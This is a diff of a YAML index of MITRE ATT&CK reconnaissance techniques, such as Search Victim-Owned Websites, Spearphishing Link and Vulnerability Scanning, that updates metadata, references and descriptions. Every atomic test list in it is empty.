-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -55219,13 +55901,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -55250,7 +55960,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -55266,8 +55976,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -55289,7 +55997,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55305,8 +56013,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -55332,7 +56038,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55350,13 +56056,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55412,7 +56116,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -55463,7 +56167,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -55484,7 +56187,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55500,8 +56203,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -55523,7 +56224,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55539,8 +56240,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -55562,7 +56261,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55578,12 +56277,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55623,8 +56320,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -55669,11 +56366,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55713,9 +56409,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -55777,7 +56472,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -55803,7 +56497,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55824,8 +56518,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -55890,7 +56582,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -55938,7 +56629,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -55960,7 +56650,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55976,34 +56666,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56012,15 +56678,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -56042,7 +56731,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -56058,8 +56747,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -56120,29 +56807,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -56151,15 +56819,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -56185,7 +56872,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -56203,47 +56890,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56252,19 +56902,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -56287,7 +56973,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56303,8 +56989,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -56330,7 +57014,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56346,8 +57030,6 @@ reconnaissance:
       x_mitre_version: '1.1'
